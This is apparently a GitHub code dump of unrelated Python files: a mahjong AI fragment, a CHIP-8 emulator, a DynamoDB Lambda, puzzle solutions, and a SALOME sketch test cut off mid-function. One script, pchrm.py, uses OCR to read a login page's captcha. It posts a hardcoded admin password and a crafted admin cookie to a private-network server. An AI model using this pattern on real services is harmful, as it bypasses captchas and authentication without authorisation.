宝牌\n :param discards: 弃牌\n :param discards_op: 场面副露\n :param canchi: 吃牌权限\n :param self_turn: 是否是自己回合\n :param fei_king: 飞宝数\n :param isHu: 是否胡牌\n :return: [],isHu 动作组合牌,是否胡牌\n \"\"\"\n if isHu:\n return [], True\n\n # 更新全局变量\n global T_SELFMO, LEFT_NUM, t2tot3_dict, t1tot3_dict\n LEFT_NUM, discards_list = trandfer_discards(discards=discards, discards_op=discards_op, handcards=cards)\n LEFT_NUM[translate16_33(pre_king(king_card))] -= 1\n\n # if remain_num == 0:\n # remain_num = 1\n remain_num = sum(LEFT_NUM)\n if round > 100:\n T_SELFMO = []\n RT1 = []\n RT2 = []\n RT3 = []\n else:\n T_SELFMO = [float(i) / remain_num for i in LEFT_NUM]\n RT1 = []\n RT2 = []\n RT3 = []\n\n t1tot3_dict = MJ.t1tot3_info(T_selfmo=T_SELFMO, RT1=[], RT2=[], RT3=[])\n t2tot3_dict = MJ.t2tot3_info(T_selfmo=T_SELFMO, RT1=[], RT2=[], RT3=[])\n\n left_num = LEFT_NUM\n\n # cards.sort()\n # suits = [sorted(e) for e in suits]\n # print ('recommend_op', suits)\n # left_num, discards_list = trandfer_discards(discards=discards, discards_op=discards_op, handcards=cards)\n # left_num[translate16_33(king_card)] = 0\n # left_num[translate16_33(pre_king(king_card))] -= 1 # 宝牌前一张减一\n remain_num = sum(left_num)\n if remain_num == 0:\n remain_num = 1\n paixing = paixing_choose(cards=cards, suits=suits, king_card=king_card, discards=discards, discards_op=discards_op,\n op_card=op_card, fei_king=fei_king)\n if paixing == 0:\n # print(\"choose pinghu\", cards)\n return pinghu(cards, suits, leftNum=left_num, discards=discards, discards_real=[], discardsOp=discards_op,\n round=round, remainNum=sum(left_num), seat_id=0, kingCard=king_card, fei_king=fei_king,\n op_card=op_card).recommend_op(op_card=op_card, canchi=canchi, self_turn=self_turn, isHu=isHu)\n elif paixing == 1:\n # print(\"choose jiuyao\")\n if isHu:\n return [], isHu\n return jiuyao().recommend_op(op_card=op_card, cards=cards, suits=suits, left_num=left_num, king_card=king_card,\n canchi=canchi, self_turn=self_turn), False\n elif paixing == 2:\n if isHu:\n return [], isHu\n # print(\"choose qidui\")\n return qidui().recommend_op(op_card=op_card, cards=cards, suits=suits), False\n elif paixing == 3:\n # print(\"choose ssl\")\n if isHu:\n return [], isHu\n return ssl(cards, suits, discards_list).recommend_op(), False\n","repo_name":"huxiaosir/RL-Group","sub_path":"mah_tool/so_lib/shangraoMJ_v2.py","file_name":"shangraoMJ_v2.py","file_ext":"py","file_size_in_byte":256659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33066984723","text":"import pytesseract\nfrom PIL import Image\nimport PIL.ImageOps\nimport os\nimport requests,json\nfrom urllib.parse import quote,unquote\nimport connector\nimport time\nfrom urllib import request\nsession = requests.Session()\n\ndef convert_img(img, threshold):\n img = img.convert(\"L\") # 处理灰度\n pixels = img.load()\n for x in range(img.width):\n for y in range(img.height):\n if pixels[x, y] > threshold:\n pixels[x, y] = 255\n else:\n pixels[x, y] = 0\n return img\n\n\ndef initTable(threshold=60):\n table = []\n for i in range(256):\n if i < threshold:\n table.append(0)\n else:\n table.append(1)\n return table\ndef getverify(path):\n\tfor root,dir,file in os.walk(path):\n\t\tfor tt in file:\n\t\t\tdd=os.path.join(os.path.abspath(root),tt)\n\t\t\tim = Image.open(dd)\n\t#图片的处理过程\n\t\t\tim = im.convert('L')\n\t\t\tbinaryImage = im.point(initTable(), '1')\n\t\t\tim1 = binaryImage.convert('L')\n\t\t\tim2 = PIL.ImageOps.invert(im1)\n\t\t\tim3 = im2.convert('1')\n\t\t\tim4 = im3.convert('L')\n\t\t\t#将图片中字符裁剪保留\n\t\t\tbox = (3,2,46,22) \n\t\t\tregion = im4.crop(box) \n\t\t\t#将图片字符放大\n\t\t\tout = region.resize((120,55)) \n\t\t\treturn pytesseract.image_to_string(out)\n\ndef get_and_save_verify(url1,i):\n try:\n url = url1\n request.urlretrieve(url,'img\\\\'+str(i) + '.png')\n print('第' + str(i) + '张图片下载成功')\n except Exception:\n print('第' + str(i) + '张图片下载失败')\n\n\nfrom urllib.parse import quote,unquote\nfrom urllib.parse import quote,unquote\nfrom bs4 import BeautifulSoup\n\ni1=session.get('http://192.168.0.181:8090/Authentication/Login')\nhtml_doc=i1.text\nsoup = BeautifulSoup(html_doc, 'html.parser')\npurl=soup.find(id='validateCode1_imgValidateCode').attrs['src']\nvurl=\"http://192.168.0.181:8090/\"+purl\n\n# get_and_save_verify(vurl,1)\n# vd=getverify('img')\n# print(vd)\nprint(vurl)\nua='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'\nheader = {\"User-Agent\" : ua,\n \"Referer\" : \"http://192.168.0.181:8090/Authentication/Login\",\n \"Cookie\":r\"ASP.NET_SessionId=rffbvm0zaiariab5dak3idcd; uid=id=1&usercode=admin&username=%e7%b3%bb%e7%bb%9f%e7%ae%a1%e7%90%86%e5%91%98&login=admin&usertype=9&isadmin=True&customcode=&suppliercode=\"\n }\nform_data = {\n \"ReturnUrl\":\"ww.dd.cc\",\n \"ValidateCodeID\":\"ValidateCode1\",\n \"Login\": \"admin\",\n \"Password\": \"txcallme\",\n \"ValidateCode\":2750,\n \"RememberMe\":0\n \n}\n\n\n\ni2 = session.post('http://192.168.0.181:8090/Authentication/Validate', headers = header,data=form_data)\nc2 = i2.cookies.get_dict()\nprint (i2.content.decode('utf-8'))\n","repo_name":"aiiw/mypy","sub_path":"pchrm.py","file_name":"pchrm.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"34169903466","text":"#! /usr/bin/env python\n\n\"\"\"\nA lambda function to update an object in DynamoDB\n\nTest item\n{\n\"id\": \"1\",\n\"done\": true\n}\n\"\"\"\nimport boto3\nimport json\n\ndynamodb = boto3.resource('dynamodb')\ntable_name = 'todolist'\n\ndef updateTaskStatus_handler(event, context):\n \"\"\"\n Update an item (task) in dynamoDB table.\n\n input is an object with a task id and other attributes to be\n updated.\n \"\"\"\n table = dynamodb.Table(table_name)\n obj = json.loads(event[\"body\"])\n try:\n resp = table.get_item(Key={\"id\": obj[\"id\"]}).keys()\n if 'Item' in resp:\n resp = table.update_item(\n Key={\"id\": obj[\"id\"]},\n UpdateExpression='SET done = :val1',\n ExpressionAttributeValues={':val1': obj[\"done\"]}\n )\n return {\n \"statusCode\": 200,\n \"headers\": {\"Access-Control-Allow-Origin\": \"*\",},\n \"body\": json.dumps(resp)\n }\n else:\n return {\n \"statusCode\": 200,\n \"headers\": {\"Access-Control-Allow-Origin\": \"*\",},\n \"body\": json.dumps(\"Item doesn't exist\")\n }\n except Exception as e:\n return {\n \"statusCode\": 500,\n \"headers\": {\n \"Access-Control-Allow-Origin\": \"*\"\n },\n \"body\": json.dumps(str(e))\n }\n","repo_name":"dmuiruri/task_manager","sub_path":"taskapp/updatetask.py","file_name":"updatetask.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39542815243","text":"import time\n\ndef compute():\n with open('day1_puzzle_input.txt') as fp:\n input = [int(x) for x in fp.readlines()]\n slice_window = 2 # 0-2 to start\n count = 0\n\n for i, _ in enumerate(input):\n cur = sum(input[i:slice_window+1])\n comp = sum(input[i+1:slice_window+2])\n if cur < comp:\n count += 1\n\n slice_window += 1 \n \n print(f'readings increased {count} times')\n\nif __name__ == \"__main__\":\n start = time.perf_counter()\n compute()\n end = time.perf_counter()\n print(f\"Execution Time : {end- start:0.6f}\" )\n","repo_name":"osiris43/advent_of_code","sub_path":"2021/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73475550521","text":"import numpy as np\n\nfrom math import exp\nfrom scipy import constants\n\nclass Propagation():\n # ! units of distance and time\n def __init__(self, speed_func):\n\n if speed_func == '2/3c':\n speed = ((2/3) * constants.speed_of_light) / 1000\n self.time_func = lambda x: x / speed\n\n elif speed_func == '1/3c':\n speed = ((1/3) * constants.speed_of_light) / 1000\n self.time_func = lambda x: x / speed\n\n elif speed_func == 'paper':\n # ! The empirical speed function uses meters as input\n self.time_func = lambda x: 5.817e+07 * exp(1.645e-07*x) -4.785e+07 * exp(-2.812e-06*x)\n\n def get_time(self, x):\n try:\n time = self.time_func(x)\n except Exception as e:\n print ('Failed in Propagation time_func:', e, 'x=', x)\n time = 0\n return time\n\n ","repo_name":"katharinakohls/VerLoc","sub_path":"verloc/propagation.py","file_name":"propagation.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"37601590260","text":"## Advent of Code 2019: Day 2\n## https://adventofcode.com/2019/day/2\n## Jesse Williams | github.com/vblank182\n## Answers: [Part 1]: 3516593, [Part 2]: 7749\n\n### Intcode Computer v1 ###\n\ndef runTape(initialTape, input):\n workTape = initialTape.copy()\n\n (workTape[1], workTape[2]) = input\n\n ptr = 0\n while True:\n # Determine the current opcode\n opcode = workTape[ptr]\n\n if opcode == 1: # Addition\n workTape[workTape[ptr+3]] = workTape[workTape[ptr+1]] + workTape[workTape[ptr+2]]\n elif opcode == 2: # Multiplication\n workTape[workTape[ptr+3]] = workTape[workTape[ptr+1]] * workTape[workTape[ptr+2]]\n elif opcode == 99: # Program finished\n return workTape\n break\n else:\n print(\"ERROR: Unknown opcode '{}'.\".format(opcode))\n break\n\n ptr = ptr + 4\n\ndef reverseSearch(initialTape, targetOutput):\n # Searches for an input pair that produces the desired output.\n for inputL in range(0, len(initialTape)):\n for inputR in range(0, len(initialTape)):\n output = runTape(initialTape, (inputL, inputR))[0]\n if targetOutput == output:\n return (inputL, inputR)\n print(\"Output not found.\")\n return (-1, -1)\n\nif __name__ == '__main__':\n\n # Load program\n with open(\"day02_input.txt\") as f:\n initialTapeStrs = f.read()[:-1].split(',')\n initialTape = [int(i) for i in initialTapeStrs]\n\n ## Part 1\n finalTape = runTape(initialTape, (12, 2))\n print(\"[Part 1] Output: {}\".format(finalTape[0]))\n\n ## Part 2\n inputsNeeded = reverseSearch(initialTape, 19690720)\n print(\"[Part 2] Inputs: {} {}\".format(inputsNeeded[0], inputsNeeded[1]))\n","repo_name":"xram64/AdventOfCode2019","sub_path":"day02/day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24059976869","text":"from kivy.lang import Builder\n\nimport os\n\nfrom kivy.properties import ObjectProperty\n\nfrom editor.components.dialogs.ok_cancel_dialog import OkCancelDialog\n\n\nclass FileChooserDialog(OkCancelDialog):\n\n dialog_widget = ObjectProperty()\n\n def __init__(self, **kwargs):\n path = kwargs.get(\"path\", os.path.expanduser(\"~\").replace(\"\\\\\", \"/\"))\n self.dialog_widget = Builder.load_string(f'''\nBoxLayout:\n size: root.size\n pos: root.pos\n orientation: \"vertical\"\n FileChooserListView:\n size: root.size\n id: file_chooser\n path: '{path}'\n on_selection: text_input.text =\\\n self.selection and self.selection[0] or ''\n\n TextInput:\n id: text_input\n size_hint_y: None\n height: 30\n multiline: False\n text: '{path}'\n ''')\n super(FileChooserDialog, self).__init__(\n **kwargs,\n title=\"Choose a file\",\n dialog_content=self.dialog_widget)\n\n def confirm(self):\n self.callback(self.dialog_widget.ids['text_input'].text)\n self.used_callback = True\n self.dismiss()\n","repo_name":"mhcrnl/PyTextEditor","sub_path":"editor/components/dialogs/file_chooser_dialog.py","file_name":"file_chooser_dialog.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"24134263902","text":"import arduino_sender\ndef circle_pattern_generator():\n outer_circle= [0,4,8,12,13,14,15,11,7,3,2,1]\n inner_circle=[5,9,10,6]\n outer_circle_startpoints=[]\n outer_circle_middlepoints=[]\n outer_circle_endpoints=[]\n inner_circle_startpoints=[]\n inner_circle_middlepoints=[]\n inner_circle_endpoints=[]\n Dict={0:6,1:10,2:13,3:15,4:3,5:7,6:11,7:14,8:1,9:4,10:8,11:12,12:0,13:2,14:5,15:9}\n for i in range(len(outer_circle)):\n outer_circle_startpoints.append(i*30)\n outer_circle_middlepoints.append(i*30 + 100)\n outer_circle_endpoints.append(i*30 + 200)\n for i in range(len(inner_circle)):\n inner_circle_startpoints.append(i*30)\n inner_circle_middlepoints.append(i*30 + 100)\n inner_circle_endpoints.append(i*30 + 200)\n i=0\n j=0\n matrix=[]\n for _ in range(16):\n matrix.append(0)\n b=1\n k=0\n while b==1:\n \n i+=12\n j+=4\n for x in range(len(outer_circle)):\n if i>outer_circle_startpoints[x] and iouter_circle_middlepoints[x] and iinner_circle_startpoints[x] and jinner_circle_middlepoints[x] and j< inner_circle_endpoints[x]:\n matrix[Dict[inner_circle[x]]]=200-(j-inner_circle_startpoints[x])\n else:\n matrix[Dict[inner_circle[x]]]=0\n arduino_sender.sendData(matrix)\n if i>530:\n i=i%530\n k+=1\n if j>290:\n j=j%290\n if k>4:\n b=1\n break\ndef main():\n circle_pattern_generator()\nif __name__ == \"__main__\":\n main() ","repo_name":"alkrona/flower_project_repo_withdocs","sub_path":"circle_pattern.py","file_name":"circle_pattern.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17281459315","text":"from random import random\nimport keyboard\nimport os\n\nVERBOSE = False\nTERMINAL_GAME = False\n\nSCREEN_WIDTH = 64\nSCREEN_HEIGHT = 32\n\nBEGIN_ROM_ADDRESS = 0x200\n\nAVAILABLE_KEYS = list(range(0x30, 0x3A)) + list(range(0x41, 0x47))\nKEYBOARD_MAP = {\n 0x31: '1', 0x32: '2', 0x33: '3', 0x43: '4',\n 0x34: 'Q', 0x35: 'W', 0x36: 'E', 0x44: 'R',\n 0x37: 'A', 0x38: 'S', 0x39: 'D', 0x45: 'F',\n 0x41: 'Z', 0x30: 'X', 0x42: 'C', 0x46: 'V',\n 0x1: '1', 0x2: '2', 0x3: '3', 0x4: '4',\n 0x5: 'Q', 0x6: 'W', 0x7: 'E', 0x8: 'R',\n 0x9: 'A', 0xA: 'S', 0xB: 'D', 0xC: 'F',\n 0xD: 'Z', 0xE: 'X', 0xF: 'C', 0x10: 'V'\n}\n\nKEYS = [\n '1', '2', '3', '4',\n 'Q', 'W', 'E', 'R',\n 'A', 'S', 'D', 'F',\n 'Z', 'X', 'C', 'V']\n\nNUMBER_SPRITES = [0xF0, 0x90, 0x90, 0x90, 0xF0, # 0\n 0x20, 0x60, 0x20, 0x20, 0x70, # 1\n 0xF0, 0x10, 0xF0, 0x80, 0xF0, # 2\n 0xF0, 0x10, 0xF0, 0x10, 0xF0, # 3\n 0x90, 0x90, 0xF0, 0x10, 0x10, # 4\n 0xF0, 0x80, 0xF0, 0x10, 0xF0, # 5\n 0xF0, 0x80, 0xF0, 0x90, 0xF0, # 6\n 0xF0, 0x10, 0x20, 0x40, 0x40, # 7\n 0xF0, 0x90, 0xF0, 0x90, 0xF0, # 8\n 0xF0, 0x90, 0xF0, 0x10, 0xF0, # 9\n 0xF0, 0x90, 0xf0, 0x90, 0x90, # A\n 0xE0, 0x90, 0xE0, 0x90, 0xE0, # B\n 0xF0, 0x80, 0x80, 0x80, 0xF0, # C\n 0xE0, 0x90, 0x90, 0x90, 0xE0, # D\n 0xF0, 0x80, 0xF0, 0x80, 0xF0, # E\n 0xF0, 0x80, 0xF0, 0x80, 0x80] # F\n\n\n\n\n\n\n\n\ndef dec_to_bin(x):\n return int(bin(int(x))[2:])\n\n\nclass Chip8:\n\n def __init__(self):\n self.MEMORY = [0] * 4096\n for i in range(4096):\n self.MEMORY[i] = 0\n\n self.MEMORY[0x00:0x50] = NUMBER_SPRITES\n\n self.V_REG = [0] * 16\n self.I_REG = 0\n\n self.TIMER = 0\n self.SOUND = 0\n\n self.PC = 0\n self.SP = 0xEFF\n\n self.DISPLAY = []\n self.ACTIVE_KEYS = []\n\n self.updated_display = 1;\n\n for x_screen in range(SCREEN_WIDTH):\n new_column = []\n for y_screen in range(SCREEN_HEIGHT):\n new_column.append(0)\n self.DISPLAY.append(new_column)\n\n def update_keys(self):\n pressed_keys = []\n for key in KEYS:\n if keyboard.is_pressed(key):\n pressed_keys.append(key)\n self.ACTIVE_KEYS = pressed_keys\n\n def check_key(self, key):\n return KEYBOARD_MAP[key] in self.ACTIVE_KEYS\n\n def display_clear(self):\n for x in range(SCREEN_WIDTH):\n for y in range(SCREEN_HEIGHT):\n self.DISPLAY[x][y] = 0\n\n def set_keys(self, keys):\n self.ACTIVE_KEYS = keys\n\n def show_display(self):\n display_buffer = \"\"\n display_buffer += \".\"\n for x in range(SCREEN_WIDTH):\n display_buffer += '_'\n display_buffer += '\\n'\n for y in range(SCREEN_HEIGHT):\n display_buffer += '|'\n for x in range(SCREEN_WIDTH):\n if self.DISPLAY[x][y] == 1:\n display_buffer += '▓'\n else:\n display_buffer += ' '\n\n display_buffer += '\\n'\n\n clearConsole = lambda: os.system('cls' if os.name in ('nt', 'dos') else 'clear')\n clearConsole()\n print(display_buffer)\n\n def get_display(self):\n return self.DISPLAY\n\n # Return from subroutine\n # 00EE\n # PC = address at top of stack\n # SP -= 2\n def RET(self):\n if VERBOSE:\n print(\"0033\")\n self.PC = self.MEMORY[self.SP] << 8\n self.PC |= self.MEMORY[self.SP - 1]\n self.SP -= 2\n\n # Jump 1nnn\n # PC = address nnn\n def JMP(self, addr):\n if VERBOSE:\n print(\"1nnn\")\n self.PC = addr\n\n # Call 2nnn\n # Calls subroutine at nnn\n def CALL(self, addr):\n if VERBOSE:\n print(\"2nnn\")\n self.SP += 2\n self.MEMORY[self.SP] = self.PC >> 8\n self.MEMORY[self.SP - 1] = self.PC & 0xFF\n self.PC = addr\n\n # SE 3xkk\n def SEB(self, x, byte):\n if VERBOSE:\n print(\"4xkk\")\n if self.V_REG[x] == byte:\n self.PC += 2\n\n # SNE 4xkk\n def SNEB(self, x, byte):\n if VERBOSE:\n print(\"4xkkk\")\n if self.V_REG[x] != byte:\n self.PC += 2\n\n # SE 5xy0\n def SER(self, x, y):\n if VERBOSE:\n print(\"5xy0\")\n if self.V_REG[x] == self.V_REG[y]:\n self.PC += 2\n\n # LD 6xkk\n def LDB(self, x, byte):\n if VERBOSE:\n print(\"6xkk\")\n self.V_REG[x] = byte\n\n # ADD 7xkk\n def ADDB(self, x, byte):\n if VERBOSE:\n print(\"7xkk\")\n self.V_REG[x] = self.V_REG[x] + byte\n self.V_REG[x] &= 0xFF\n\n # LD 8xy0\n def LDRR(self, x, y):\n if VERBOSE:\n print(\"8xy0\")\n self.V_REG[x] = self.V_REG[y]\n\n # OR 8xy1\n def ORR(self, x, y):\n if VERBOSE:\n print(\"8xy1\")\n self.V_REG[x] = self.V_REG[x] | self.V_REG[y]\n\n # AND 8xy2\n def ANDR(self, x, y):\n if VERBOSE:\n print(\"8xy2\")\n self.V_REG[x] &= self.V_REG[y]\n\n # XOR 8xy3\n def XORR(self, x, y):\n if VERBOSE:\n print(\"8xy3\")\n self.V_REG[x] ^= self.V_REG[y]\n\n # ADD 8xy4\n def ADDR(self, x, y):\n if VERBOSE:\n print(\"8xy4\")\n sum = self.V_REG[x] + self.V_REG[y]\n if sum >> 8 == 1:\n self.V_REG[0xF] = 1\n sum &= 0xFF\n else:\n self.V_REG[0xF] = 0\n self.V_REG[x] = sum\n\n # SUB 8xy5 #Underflow how it works we do not\n def SUBR(self, x, y):\n if VERBOSE:\n print(\"8xy5\")\n dif = self.V_REG[x] - self.V_REG[y]\n if dif < 0:\n self.V_REG[0xF] = 0\n dif += 256\n else:\n self.V_REG[0xF] = 1\n self.V_REG[x] = dif\n\n # SHR 8xy6\n def SHR(self, x):\n if VERBOSE:\n print(\"8xy6\")\n self.V_REG[0xF] = self.V_REG[x] & 0x01\n self.V_REG[x] >>= 1\n\n # SUBN 8xy7\n def SUBNR(self, x, y):\n if VERBOSE:\n print(\"8xy7\")\n dif = self.V_REG[y] - self.V_REG[x]\n if dif < 0:\n self.V_REG[0xF] = 0\n dif += 256\n else:\n self.V_REG[0xF] = 1\n self.V_REG[x] = dif\n\n # SHL 8xyE\n def SHLR(self, x):\n if VERBOSE:\n print(\"8xyE\")\n self.V_REG[0xF] = (self.V_REG[x] >> 7) & 0x01\n self.V_REG[x] = self.V_REG[x] << 1 & 0xFF\n\n # SNE 9xy0\n def SNER(self, x, y):\n if VERBOSE:\n print(\"9xy0\")\n if self.V_REG[x] != self.V_REG[y]:\n self.PC += 2\n\n # LD Annn\n def LDRI(self, addr):\n if VERBOSE:\n print(\"Annn\")\n self.I_REG = addr\n\n # JP Bnnn\n def JMPI(self, addr):\n if VERBOSE:\n print(\"Bnnn\")\n self.PC = addr + self.V_REG[0x00]\n\n # RND Cxkk\n def RNDB(self, x, byte):\n if VERBOSE:\n print(\"Cnnn\")\n self.V_REG[x] = int(random() * 256) & byte\n\n def DRW(self, x, y, n):\n if VERBOSE:\n print(\"Dxyn\")\n erased = 0\n for i in range(n):\n sprite_line = self.MEMORY[self.I_REG + i]\n for j in range(8):\n original_pixel = self.DISPLAY[(self.V_REG[x] + j) % SCREEN_WIDTH][(self.V_REG[y] + i) % SCREEN_HEIGHT]\n sprite_pixel = sprite_line >> (7 - j) & 0x1\n new_pixel = original_pixel ^ sprite_pixel\n if original_pixel & sprite_pixel == 0x1:\n erased = 0x1\n self.DISPLAY[(self.V_REG[x] + j) % SCREEN_WIDTH][(self.V_REG[y] + i) % SCREEN_HEIGHT] = new_pixel\n self.V_REG[0xF] = erased\n self.updated_display = 1\n if TERMINAL_GAME:\n self.show_display()\n\n # SKP Ex9E\n def SKP(self, x):\n if VERBOSE:\n print(\"Wz9E\")\n if TERMINAL_GAME:\n self.update_keys()\n if self.check_key(self.V_REG[x]):\n self.PC += 2\n\n # SKNP ExA1\n def SKNP(self, x):\n if VERBOSE:\n print(\"ExA1\")\n if TERMINAL_GAME:\n self.update_keys()\n if not self.check_key(self.V_REG[x]):\n self.PC += 2\n\n # LD Fx07\n def LDRT(self, x):\n if VERBOSE:\n print(\"Fx07\")\n self.V_REG[x] = self.TIMER\n\n # LD Fx0A\n def LDWFK(self, x):\n if VERBOSE:\n print(\"Fx0A\")\n while True:\n for key in AVAILABLE_KEYS:\n if TERMINAL_GAME:\n self.update_keys()\n if self.check_key(key):\n self.V_REG[x] = key\n return\n\n # LD Fx15\n def LDTR(self, x):\n if VERBOSE:\n print(\"Fx15\")\n self.TIMER = self.V_REG[x]\n\n # LD Fx18\n def LDSR(self, x):\n if VERBOSE:\n print(\"Fx18\")\n\n self.SOUND = self.V_REG[x]\n\n # ADD Fx1E\n def ADDIR(self, x):\n if VERBOSE:\n print(\"Fx1E\")\n\n self.I_REG += self.V_REG[x]\n\n # LD Fx29\n def LDSPRI(self, x):\n if VERBOSE:\n print(\"Fx29\")\n self.I_REG = int(self.V_REG[x]) * 5\n\n # LD Fx33\n def BCD(self, x):\n if VERBOSE:\n print(\"Fx33\")\n\n self.MEMORY[self.I_REG] = (self.V_REG[x] // 100) % 10\n self.MEMORY[self.I_REG + 1] = (self.V_REG[x] // 10) % 10\n self.MEMORY[self.I_REG + 2] = self.V_REG[x] % 10\n\n # Fx55\n def LDMR(self, x):\n if VERBOSE:\n print(\"Fx55\")\n for i in range(x + 1):\n self.MEMORY[self.I_REG + i] = self.V_REG[i]\n\n # Fx65\n def LDRM(self, x):\n if VERBOSE:\n print(\"Fx65\")\n for i in range(x + 1): # Maybe increment I\n self.V_REG[i] = self.MEMORY[self.I_REG + i]\n\n def print_mem(self, start, end):\n for address in range(start, end):\n print(\"ADDRESS {}: {} {}\".format(hex(address), hex(self.MEMORY[address]), dec_to_bin(self.MEMORY[address])))\n\n def read_pc(self):\n b0 = self.MEMORY[self.PC] >> 4 & 0xF\n b1 = self.MEMORY[self.PC] & 0xF\n b2 = self.MEMORY[self.PC + 1] >> 4 & 0xF\n b3 = self.MEMORY[self.PC + 1] & 0xF\n self.PC += 2\n self.interpret_command(b0, b1, b2, b3)\n\n def load_rom(self, filename):\n with open(filename, \"rb\") as rom:\n byte = rom.read(1)\n address = BEGIN_ROM_ADDRESS\n while byte:\n self.MEMORY[address] = int.from_bytes(byte, 'little')\n address += 1\n byte = rom.read(1)\n self.PC = 0x200\n self.SP = 0xEFF\n\n def interpret_command(self, b0, b1, b2, b3):\n addr = 0\n byte = 0\n\n x = b1\n y = b2\n\n addr |= b1\n addr <<= 4\n addr |= b2 # nnn\n addr <<= 4\n addr |= b3\n\n byte |= b2\n byte <<= 4 # kk\n byte |= b3\n\n if b0 == 0x0 and b1 == 0x0 and b2 == 0xE and b3 == 0x0:\n self.display_clear()\n elif b0 == 0x0 and b1 == 0x0 and b2 == 0xE and b3 == 0xE:\n self.RET()\n elif b0 == 0x1:\n self.JMP(addr)\n elif b0 == 0x2:\n self.CALL(addr)\n elif b0 == 0x3:\n self.SEB(x, byte)\n elif b0 == 0x4:\n self.SNEB(x, byte)\n elif b0 == 0x5 and b3 == 0x0:\n self.SER(x, y)\n elif b0 == 0x6:\n self.LDB(x, byte)\n elif b0 == 0x7:\n self.ADDB(x, byte)\n elif b0 == 0x8 and b3 == 0x0:\n self.LDRR(x, y)\n elif b0 == 0x8 and b3 == 0x1:\n self.ORR(x, y)\n elif b0 == 0x8 and b3 == 0x2:\n self.ANDR(x, y)\n elif b0 == 0x8 and b3 == 0x3:\n self.XORR(x, y)\n elif b0 == 0x8 and b3 == 0x4:\n self.ADDR(x, y)\n elif b0 == 0x8 and b3 == 0x5:\n self.SUBR(x, y)\n elif b0 == 0x8 and b3 == 0x6:\n self.SHR(x)\n elif b0 == 0x8 and b3 == 0x7:\n self.SUBNR(x, y)\n elif b0 == 0x8 and b3 == 0xE:\n self.SHLR(x)\n elif b0 == 0x9 and b3 == 0x0:\n self.SNER(x, y)\n elif b0 == 0xA:\n self.LDRI(addr)\n elif b0 == 0xB:\n self.JMPI(addr)\n elif b0 == 0xC:\n self.RNDB(x, byte)\n elif b0 == 0xD:\n self.DRW(x, y, b3)\n elif b0 == 0xE and b2 == 0x9 and b3 == 0xE:\n self.SKP(x)\n elif b0 == 0xE and b2 == 0xA and b3 == 0x1:\n self.SKNP(x)\n elif b0 == 0xF and b2 == 0x0 and b3 == 0x7:\n self.LDRT(x)\n elif b0 == 0xF and b2 == 0x0 and b3 == 0xA:\n self.LDWFK(x)\n elif b0 == 0xF and b2 == 0x1 and b3 == 0x5:\n self.LDTR(x)\n elif b0 == 0xF and b2 == 0x1 and b3 == 0x8:\n self.LDSR(x)\n elif b0 == 0xF and b2 == 0x1 and b3 == 0xE:\n self.ADDIR(x)\n elif b0 == 0xF and b2 == 0x2 and b3 == 0x9:\n self.LDSPRI(x)\n elif b0 == 0xF and b2 == 0x3 and b3 == 0x3:\n self.BCD(x)\n elif b0 == 0xF and b2 == 0x5 and b3 == 0x5:\n self.LDMR(x)\n elif b0 == 0xF and b2 == 0x6 and b3 == 0x5:\n self.LDRM(x)\n else:\n print(\"UNKNOWN\")\n print(\"{} {} {} {} \".format(hex(b0), hex(b1), hex(b2), hex(b3)))\n input(\"\")\n\n def tick(self):\n self.updated_display = 0\n if self.TIMER > 0:\n self.TIMER -= 1\n if self.SOUND > 0:\n self.SOUND -= 1\n self.read_pc()\n self.ACTIVE_KEYS = []\n\n\nif TERMINAL_GAME:\n emu = Chip8()\n emu.load_rom(\"pong.ch8\")\n while True:\n emu.tick()\n","repo_name":"AngelouDi/8chipico","sub_path":"chippico8.py","file_name":"chippico8.py","file_ext":"py","file_size_in_byte":13736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"40222766546","text":"from GeomDataAPI import *\nfrom ModelAPI import *\nfrom SketchAPI import SketchAPI_Sketch\nimport math\nfrom salome.shaper import model\n\n__updated__ = \"2017-04-06\"\n\nTOLERANCE = 1.e-7\n\n#=========================================================================\n# Auxiliary functions\n#=========================================================================\n\ndef verifyLastArc(theSketch, theCenter, theStart, theEnd):\n \"\"\"\n subroutine to verify position of last arc in the sketch\n \"\"\"\n aLastArc = model.lastSubFeature(theSketch, \"SketchArc\")\n model.assertArc(aLastArc, theCenter, theStart, theEnd)\n\ndef verifyTangent(theFeature1, theFeature2):\n anArcs = []\n aLines = []\n aFeatures = [theFeature1, theFeature2]\n for feat in aFeatures:\n if feat.getKind() == \"SketchLine\":\n aLines.append(feat)\n elif feat.getKind() == \"SketchArc\":\n anArcs.append(feat)\n if len(anArcs) == 2:\n verifyArcArcTangent(anArcs[0], anArcs[1])\n elif len(anArcs) == 1 and len(aLines) == 1:\n verifyArcLineTangent(anArcs[0], aLines[0])\n\ndef verifyArcArcTangent(theArc1, theArc2):\n aCenter1 = geomDataAPI_Point2D(theArc1.attribute(\"center_point\"))\n aStart1 = geomDataAPI_Point2D(theArc1.attribute(\"start_point\"))\n aRadius1 = model.distancePointPoint(aStart1, aCenter1)\n\n aCenter2 = geomDataAPI_Point2D(theArc2.attribute(\"center_point\"))\n aStart2 = geomDataAPI_Point2D(theArc2.attribute(\"start_point\"))\n aRadius2 = model.distancePointPoint(aStart2, aCenter2)\n\n aDistCC = model.distancePointPoint(aCenter1, aCenter2)\n aRSum = aRadius1 + aRadius2\n aRDiff = 